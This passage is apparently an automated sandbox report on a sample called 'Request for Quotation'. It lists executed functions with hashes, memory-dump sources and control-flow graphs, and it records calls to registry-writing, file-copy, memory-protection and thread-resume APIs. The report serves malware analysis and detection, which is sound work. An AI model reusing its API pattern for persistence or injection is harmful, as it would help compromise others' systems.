62383->62392 62396 63c78c0 62383->62396 62388 63cf7b8 62387->62388 62390 63c78b4 RegSetValueExA 62388->62390 62391 63c78c0 RegSetValueExA 62388->62391 62389 63cf7f2 62389->62360 62390->62389 62391->62389 62393 63c791b RegSetValueExA 62392->62393 62395 63c79d4 62393->62395 62397 63c791b RegSetValueExA 62396->62397 62399 63c79d4 62397->62399 62401 63cf968 62400->62401 62410 63c74a5 62401->62410 62414 63c74b0 62401->62414 62406 63cf97d 62405->62406 62408 63c74a5 CopyFileA 62406->62408 62409 63c74b0 CopyFileA 62406->62409 62407 63cda6c 62408->62407 62409->62407 62411 63c7505 CopyFileA 62410->62411 62413 63c7607 62411->62413 62415 63c7505 CopyFileA 62414->62415 62417 63c7607 62415->62417 62248 272ca60 62249 272caa6 62248->62249 62252 272d048 62249->62252 62255 272cc9c 62252->62255 62256 272d0b0 DuplicateHandle 62255->62256 62257 272cb93 62256->62257 62430 63c4ee8 62431 63c4f36 NtProtectVirtualMemory 62430->62431 62433 63c4f80 62431->62433 62434 6416e1c 62437 641d618 VirtualProtect 62434->62437 62435 6416e47 62436 64137d7 62436->62434 62436->62435 62437->62436

                                                Executed Functions

                                                Function 0639CB31 Relevance: 14.9, Strings: 11, Instructions: 1154COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,iq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                • API String ID: 0-2318717043
                                                • Opcode ID: 8caa324929b7779b71d2a273f712a21d2f977c26ee9e4e49c54384ff7ad69cb5
                                                • Instruction ID: 33ee50f88d36c591b701ed0f0b5872be7c16f19b4bfbcab43cc477576483b405
                                                • Opcode Fuzzy Hash: 8caa324929b7779b71d2a273f712a21d2f977c26ee9e4e49c54384ff7ad69cb5
                                                • Instruction Fuzzy Hash: C7B21734A00619CFDB54DFA9C895BADB7B6BF48300F158099E505AB3A5DB70EC85CFA0
                                                Function 0639CE67 Relevance: 6.7, Strings: 5, Instructions: 495COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,iq$$eq$$eq$$eq$$eq
                                                • API String ID: 0-3411573654
                                                • Opcode ID: ecfafbe176715adb83e4d7bdf38ca39deb269a0dc3914f5703eb73b6d330010f
                                                • Instruction ID: 5d1811136e22d49c2f2ceef5b4be488cb6a785c82dd863df460dc171b0add57d
                                                • Opcode Fuzzy Hash: ecfafbe176715adb83e4d7bdf38ca39deb269a0dc3914f5703eb73b6d330010f
                                                • Instruction Fuzzy Hash: F5222934A00619CFDF64DFA4C995BADB7B6FF48300F148099D509AB2A5DB70AD85CFA0
                                                Function 063728A0 Relevance: 4.1, Strings: 3, Instructions: 363COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1415 63728a0-63728b0 1416 63728b6-63728ba 1415->1416 1417 63729c9-63729ee 1415->1417 1418 63729f5-6372a1a 1416->1418 1419 63728c0-63728c9 1416->1419 1417->1418 1420 6372a21-6372a57 1418->1420 1419->1420 1421 63728cf-63728f6 1419->1421 1437 6372a5e-6372ab4 1420->1437 1432 63729be-63729c8 1421->1432 1433 63728fc-63728fe 1421->1433 1435 6372900-6372903 1433->1435 1436 637291f-6372921 1433->1436 1435->1437 1438 6372909-6372913 1435->1438 1439 6372924-6372928 1436->1439 1453 6372ab6-6372aca call 6372d70 1437->1453 1454 6372ad8-6372aef 1437->1454 1438->1437 1441 6372919-637291d 1438->1441 1442 637292a-6372939 1439->1442 1443 6372989-6372995 1439->1443 1441->1436 1441->1439 1442->1437 1448 637293f-6372986 1442->1448 1443->1437 1444 637299b-63729b8 1443->1444 1444->1432 1444->1433 1448->1443 1512 6372acd call 6372fb8 1453->1512 1513 6372acd call 6373118 1453->1513 1463 6372af5-6372bdb call 63718d8 call 6370a70 1454->1463 1464 6372be0-6372bf0 1454->1464 1459 6372ad3 1461 6372d03-6372d0e 1459->1461 1471 6372d10-6372d20 1461->1471 1472 6372d3d-6372d5e 1461->1472 1463->1464 1469 6372bf6-6372cd0 1464->1469 1470 6372cde-6372cfa 1464->1470 1509 6372cd2 1469->1509 1510 6372cdb 1469->1510 1470->1461 1480 6372d22-6372d28 1471->1480 1481 6372d30-6372d36 1471->1481 1480->1481 1481->1472 1509->1510 1510->1470 1512->1459 1513->1459
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (iq$(iq$Hiq
                                                • API String ID: 0-2457769603
                                                • Opcode ID: 3cbd9f9240c8d9dd43b8bdc13798a4411d32e9eb1539afd5164603eeaad8024b
                                                • Instruction ID: d2bf123fa9c549b509ebd045e21c6c9e0e75e28a839d2a977573558f9afbf479
                                                • Opcode Fuzzy Hash: 3cbd9f9240c8d9dd43b8bdc13798a4411d32e9eb1539afd5164603eeaad8024b
                                                • Instruction Fuzzy Hash: D0E17434A10209DFCB54EFA4D49499EBBB2FF89300F118569E806AB365DF30ED46CB91
                                                Function 063C1CF0 Relevance: 3.0, Strings: 2, Instructions: 542COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1851 63c1cf0-63c1d11 1852 63c1d18-63c1daa 1851->1852 1853 63c1d13 1851->1853 1930 63c1db0 call 63c2620 1852->1930 1931 63c1db0 call 63c2691 1852->1931 1853->1852 1857 63c1db6-63c1ded 1859 63c1dfc 1857->1859 1860 63c1def-63c1dfa 1857->1860 1861 63c1e06-63c1ed8 1859->1861 1860->1861 1870 63c1eea-63c1f15 1861->1870 1871 63c1eda-63c1ee0 1861->1871 1872 63c2585-63c25a1 1870->1872 1871->1870 1873 63c1f1a-63c2043 1872->1873 1874 63c25a7-63c25c2 1872->1874 1883 63c2055-63c21a7 1873->1883 1884 63c2045-63c204b 1873->1884 1892 63c21a9-63c21ad 1883->1892 1893 63c2200-63c2207 1883->1893 1884->1883 1894 63c21af-63c21b0 1892->1894 1895 63c21b5-63c21fb 1892->1895 1896 63c23b2-63c23ce 1893->1896 1899 63c2442-63c2491 1894->1899 1895->1899 1897 63c220c-63c22fa 1896->1897 1898 63c23d4-63c23f8 1896->1898 1923 63c23ae-63c23af 1897->1923 1924 63c2300-63c23ab 1897->1924 1904 63c243f-63c2440 1898->1904 1905 63c23fa-63c243c 1898->1905 1912 63c24a3-63c24ee 1899->1912 1913 63c2493-63c2499 1899->1913 1904->1899 1905->1904 1916 63c2567-63c2582 1912->1916 1917 63c24f0-63c2566 1912->1917 1913->1912 1916->1872 1917->1916 1923->1896 1924->1923 1930->1857 1931->1857
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fjq$8
                                                • API String ID: 0-2019453504
                                                • Opcode ID: 7651ac79d735a225a9d8dd1f72a626db97cce05277b83222f37233739514996e
                                                • Instruction ID: 7d95438a6b435c6c70dd13c53f092beb40ec7d03ae8143ddb44b9085e869a808
                                                • Opcode Fuzzy Hash: 7651ac79d735a225a9d8dd1f72a626db97cce05277b83222f37233739514996e
                                                • Instruction Fuzzy Hash: 2842D275D00629CBDB64CF69C850AD9F7B2BF89310F5486EAD40DA7255EB30AE85CF80
                                                Function 063C1CE1 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2335 63c1ce1-63c1d11 2336 63c1d18-63c1daa 2335->2336 2337 63c1d13 2335->2337 2414 63c1db0 call 63c2620 2336->2414 2415 63c1db0 call 63c2691 2336->2415 2337->2336 2341 63c1db6-63c1ded 2343 63c1dfc 2341->2343 2344 63c1def-63c1dfa 2341->2344 2345 63c1e06-63c1ed8 2343->2345 2344->2345 2354 63c1eea-63c1f15 2345->2354 2355 63c1eda-63c1ee0 2345->2355 2356 63c2585-63c25a1 2354->2356 2355->2354 2357 63c1f1a-63c2043 2356->2357 2358 63c25a7-63c25c2 2356->2358 2367 63c2055-63c21a7 2357->2367 2368 63c2045-63c204b 2357->2368 2376 63c21a9-63c21ad 2367->2376 2377 63c2200-63c2207 2367->2377 2368->2367 2378 63c21af-63c21b0 2376->2378 2379 63c21b5-63c21fb 2376->2379 2380 63c23b2-63c23ce 2377->2380 2383 63c2442-63c2491 2378->2383 2379->2383 2381 63c220c-63c22fa 2380->2381 2382 63c23d4-63c23f8 2380->2382 2407 63c23ae-63c23af 2381->2407 2408 63c2300-63c23ab 2381->2408 2388 63c243f-63c2440 2382->2388 2389 63c23fa-63c243c 2382->2389 2396 63c24a3-63c24ee 2383->2396 2397 63c2493-63c2499 2383->2397 2388->2383 2389->2388 2400 63c2567-63c2582 2396->2400 2401 63c24f0-63c2566 2396->2401 2397->2396 2400->2356 2401->2400 2407->2380 2408->2407 2414->2341 2415->2341
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fjq$h
                                                • API String ID: 0-322255796
                                                • Opcode ID: 2145b91fc6076e21ab4f91d7d1e4c6583ad194e28a520e53f4de989c1b112973
                                                • Instruction ID: b1da18f30721d296191bae3c6085003a29353bc7bc88579bfb3232c6ea0022aa
                                                • Opcode Fuzzy Hash: 2145b91fc6076e21ab4f91d7d1e4c6583ad194e28a520e53f4de989c1b112973
                                                • Instruction Fuzzy Hash: 8261D571D006298BEB64CF6AC854BD9FBB2BF89310F54C2AAD40DA7255DB305E85CF90
                                                Function 06230040 Relevance: 2.3, Strings: 1, Instructions: 1081COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 2
                                                • API String ID: 0-450215437
                                                • Opcode ID: 0c4cbd5bf998e9ba472192378e54e4159309b029346bba90832a24aa5f79026e
                                                • Instruction ID: ee8c48a6ad9b052290ebeb9de97167c3fea4f30d9237142115d1125a8a463dd9
                                                • Opcode Fuzzy Hash: 0c4cbd5bf998e9ba472192378e54e4159309b029346bba90832a24aa5f79026e
                                                • Instruction Fuzzy Hash: C7C2B2B4E10228CFDB65DF69C984B99BBB6FB88300F1081E9D909A7355DB309E85CF51
                                                Function 063C4EE0 Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063C4F71
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: MemoryProtectVirtual
                                                • String ID:
                                                • API String ID: 2706961497-0
                                                • Opcode ID: 1b0f4f104a193e08ac0053fbf09c08b756e117096157491f4f2e9c6e9d9dad53
                                                • Instruction ID: bdfc3e10d31764e25d1c1d28c34e51d6ae72dce12269bce0f254ac795f3a50d0
                                                • Opcode Fuzzy Hash: 1b0f4f104a193e08ac0053fbf09c08b756e117096157491f4f2e9c6e9d9dad53
                                                • Instruction Fuzzy Hash: F02105B5D013499FCB10DFAAD984ADEFBF9FF48320F14842AE519A7210C7759944CBA1
                                                Function 063C4EE8 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063C4F71
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: MemoryProtectVirtual
                                                • String ID:
                                                • API String ID: 2706961497-0
                                                • Opcode ID: 623a8ee063d30231e771f7e587ea3d27c5b21b31748c8617fb78e31d668b74a6
                                                • Instruction ID: e3c25b5fc8cb1e231e5daf6c90ee425038c8a24308b78a846280146c72ce0875
                                                • Opcode Fuzzy Hash: 623a8ee063d30231e771f7e587ea3d27c5b21b31748c8617fb78e31d668b74a6
                                                • Instruction Fuzzy Hash: 9B2103B1D003499FCB10CFAAD980AEEFBF5FF48320F24842AE519A7210C7759940CBA0
                                                Function 063C5FC8 Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 063C603E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 7f750610607b4f19dd23cd2cfcebc6e57335f3949b5bd97e2ec3f91cf4874144
                                                • Instruction ID: 678ceece2f3c8f84f9b382f4542c87efa2b996b8f4a09357b478410e281fbb22
                                                • Opcode Fuzzy Hash: 7f750610607b4f19dd23cd2cfcebc6e57335f3949b5bd97e2ec3f91cf4874144
                                                • Instruction Fuzzy Hash: 4311E5B5D002198ADB20DFAAC9856AEFBF4AF59320F14842AD419B7240C77599448BA0
                                                Function 0639907B Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Teeq
                                                • API String ID: 0-348098666
                                                • Opcode ID: e0efb6ff1e075cbd0f061f4b0a847c8fe0e248ec97e197ede9cf29b9bd900251
                                                • Instruction ID: 8885653e4737eb67d06005c90b528bb2b5045a83f70669451c145dcbf8a3779f
                                                • Opcode Fuzzy Hash: e0efb6ff1e075cbd0f061f4b0a847c8fe0e248ec97e197ede9cf29b9bd900251
                                                • Instruction Fuzzy Hash: 6DE10474E15218CFEBA4CF69D884BADB7F6BB8A300F1084AAD409A7350DB345D85CF91
                                                Function 063C5FD0 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 063C603E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: d655ecfc730bcb8262d3ac9d5ea66a461d30250066b294e368f90bf538ab360d
                                                • Instruction ID: 9c401adea2d921c47113469aacf38cacc2da997f2055c1461ce176b3ef210dd6
                                                • Opcode Fuzzy Hash: d655ecfc730bcb8262d3ac9d5ea66a461d30250066b294e368f90bf538ab360d
                                                • Instruction Fuzzy Hash: 2A112CB1D002098FDB10DFAAC4856AEFBF4EF49320F14842ED519B7240CB755944CFA5
                                                Function 0668D9F0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177650227.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6670000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Dlq
                                                • API String ID: 0-3914526553
                                                • Opcode ID: 15ac5d5364f734a96d9741f18a8cbcd4bff53950e1104f280d47b5ac03e86d54
                                                • Instruction ID: 108fecb64d181db1cfe91f367638236649175b088f1beb53622460965ee682c0
                                                • Opcode Fuzzy Hash: 15ac5d5364f734a96d9741f18a8cbcd4bff53950e1104f280d47b5ac03e86d54
                                                • Instruction Fuzzy Hash: 6BD1CE74E00218DFDB54DFA9D994B9DBBB2BF88300F2081A9D409AB365DB35AD85CF50
                                                Function 0637BF00 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHeq
                                                • API String ID: 0-2873676430
                                                • Opcode ID: 6343f157fc9da5a5a0984d1aca0b34b00bc5810edad000f96b439cedffc9a9bf
                                                • Instruction ID: f455b30f7c642a9cedad620d0d20ce40fe9407bf09848d938b7545a5a1dc0d10
                                                • Opcode Fuzzy Hash: 6343f157fc9da5a5a0984d1aca0b34b00bc5810edad000f96b439cedffc9a9bf
                                                • Instruction Fuzzy Hash: 9EB11A74D15218CFEBA4CFA9C844BADFBF6BF49304F10A069D40AA7251DB794985CF84
                                                Function 0637BEF1 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PHeq
                                                • API String ID: 0-2873676430
                                                • Opcode ID: 393c241c63dadc8a4517b0ef963865a139ed739c0b081336464d6b62da7ddcc9
                                                • Instruction ID: fce802bbb2e2116ac9066935755ca632475656b66de5ce17e281939e53c95c4b
                                                • Opcode Fuzzy Hash: 393c241c63dadc8a4517b0ef963865a139ed739c0b081336464d6b62da7ddcc9
                                                • Instruction Fuzzy Hash: 67B15974D15218CFEBA4CFA9C884BADFBF6BF49304F10A06AD409A7250DB784985CF84
                                                Function 0623CC08 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Teeq
                                                • API String ID: 0-348098666
                                                • Opcode ID: c5e4e10f57a6693a7101991b0108aef37d979146d170f3e73c2666601b845b97
                                                • Instruction ID: e4178d81732eac328e8b67b1ed8753f06d47159bd58b8e61b637d194bdea90c0
                                                • Opcode Fuzzy Hash: c5e4e10f57a6693a7101991b0108aef37d979146d170f3e73c2666601b845b97
                                                • Instruction Fuzzy Hash: E9B104B4E25228CFEB94DFAAD584B9DBBF2FB49300F10906AD809B7255D7B45981CF40
                                                Function 0623CBF8 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Teeq
                                                • API String ID: 0-348098666
                                                • Opcode ID: ba48e23957e05e4e459f108e18a980f7c287992df2342f2dc146f43195680c6c
                                                • Instruction ID: e206a2a4444bbf13e214626d1d9bbeac7a33abc00c9e809fc240e3c5c5b46cb2
                                                • Opcode Fuzzy Hash: ba48e23957e05e4e459f108e18a980f7c287992df2342f2dc146f43195680c6c
                                                • Instruction Fuzzy Hash: C2B115B4E25228CFEB94DFAAD984B9DBBF2FB49300F10816AD809B7255D7745981CF40
                                                Function 06398CBD Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177206951.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6390000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Teeq
                                                • API String ID: 0-348098666
                                                • Opcode ID: 850c6e23a62488632b05ac725cfbffd5a021fae97e66185290bab4a26ef0df87
                                                • Instruction ID: 578bc9b97036a8f818516c499dabcdf5739f63fe4d65f62289913d95c5ea921e
                                                • Opcode Fuzzy Hash: 850c6e23a62488632b05ac725cfbffd5a021fae97e66185290bab4a26ef0df87
                                                • Instruction Fuzzy Hash: 15811670E05218CFEFA4CF59D894BA9B7F6BF8A300F2095AAD40DA7251D7344985CFA1
                                                Function 0623142C Relevance: .5, Instructions: 471COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d70bd48dd97a085c29429b713403b2fe530464f8b92e6188dbb4b67a490e14ed
                                                • Instruction ID: 0445c0d90e2a734dcbf787d6bb76cfa46d8ad583a8cd6219438bd11e79cc637d
                                                • Opcode Fuzzy Hash: d70bd48dd97a085c29429b713403b2fe530464f8b92e6188dbb4b67a490e14ed
                                                • Instruction Fuzzy Hash: 9C3294B4A142298FCB65DF28C988B99B7B6FF48310F1181E9D90DA7355DB30AE81CF54
                                                Function 0623BF58 Relevance: .3, Instructions: 328COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24e20c9f0b30c6dd33edb8845a3af30a618d9f69a3d115a45bd5c2daa3b54103
                                                • Instruction ID: da8849a71fae818802ea5ba1dfdb3e78306484a0af2752083d7c4933a3705a67
                                                • Opcode Fuzzy Hash: 24e20c9f0b30c6dd33edb8845a3af30a618d9f69a3d115a45bd5c2daa3b54103
                                                • Instruction Fuzzy Hash: 8AE119B4E24228CFEBA4CFA9D944BADBBF2BF49301F1090A9D809B7255D7745984CF41
                                                Function 0623BF49 Relevance: .3, Instructions: 313COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2176729190.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6230000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e06e1ed48a4ea215e735f4e019655febe151c01e6a5afa882bc75651a4688f3
                                                • Instruction ID: b08b396170e691c15b3e9ba60446589402f63a48329ee94a374cc19b1b7727a7
                                                • Opcode Fuzzy Hash: 2e06e1ed48a4ea215e735f4e019655febe151c01e6a5afa882bc75651a4688f3
                                                • Instruction Fuzzy Hash: B1E129B4E24228CFEBA4CFA9D944BADBBF2BF49301F1090A9D809B7255D7745984CF41
                                                Function 0637F793 Relevance: .2, Instructions: 242COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ab3506173a8a6f5bf6291ee4ff21194316e4186d7a8649891192258c9dea5e7
                                                • Instruction ID: f89b394f7cdc46eeea72a009a7a6badb919541e2724b56d3824ba3064baac60e
                                                • Opcode Fuzzy Hash: 3ab3506173a8a6f5bf6291ee4ff21194316e4186d7a8649891192258c9dea5e7
                                                • Instruction Fuzzy Hash: BAB1E570E11258CFEBA4DF69D984B9DBBF6BB49300F1080AED409A7255DB385A85CF81
                                                Function 0637F7A0 Relevance: .2, Instructions: 241COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177122586.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6370000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a33d4f0d18fbfbce1227f2cf880919d918e284ca032c18532aee23339055545
                                                • Instruction ID: 3cb909af1f377f8c1ca7f6aeca49fe99a68fc1152cca79226da8b3878013850f
                                                • Opcode Fuzzy Hash: 2a33d4f0d18fbfbce1227f2cf880919d918e284ca032c18532aee23339055545
                                                • Instruction Fuzzy Hash: 13B1F670E11218CFEBA4DF69D984B9DBBF6BB49300F1080AED409A7254DB385E85CF81
                                                Function 063CEC90 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe138f70c301469f4b1377b4a16a323747a5d3804bde58825f56118eb623390f
                                                • Instruction ID: 4a6d2220819abefa599e2456cf9eb02937ae30ff1d230eb098ff1ad9f89ea2f3
                                                • Opcode Fuzzy Hash: fe138f70c301469f4b1377b4a16a323747a5d3804bde58825f56118eb623390f
                                                • Instruction Fuzzy Hash: DFA103B4E01258CFEB94DFA9D544A9DBBF2BF89310F10906EE419AB264DB345D85CF80
                                                Function 063CECA0 Relevance: .2, Instructions: 229COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 112e307f9aaaa219e4943f71f1fb3883b1a78877283e681e82976a3ca3090bbf
                                                • Instruction ID: 2627e72066462f9860ae05e4ba0e7e5959fffb87e820ab269c28599686fc70ca
                                                • Opcode Fuzzy Hash: 112e307f9aaaa219e4943f71f1fb3883b1a78877283e681e82976a3ca3090bbf
                                                • Instruction Fuzzy Hash: AAA103B4E05218CFEB94DFA9D444AADBBF6BF89310F10906EE419AB254DB345D85CF80
                                                Function 063C89D6 Relevance: .2, Instructions: 224COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2177278703.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_63c0000_Request for Quotation-537262227-04.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba4f77b51d993cccd3682bd6128fea68b4ebfe688457d4c0b21828b88f3f998a
                                                • Instruction ID: a3ae71cc4cec5c3fe3d8b8b3048bccfcfc0e66bdc16229d3e48399af92a9889c
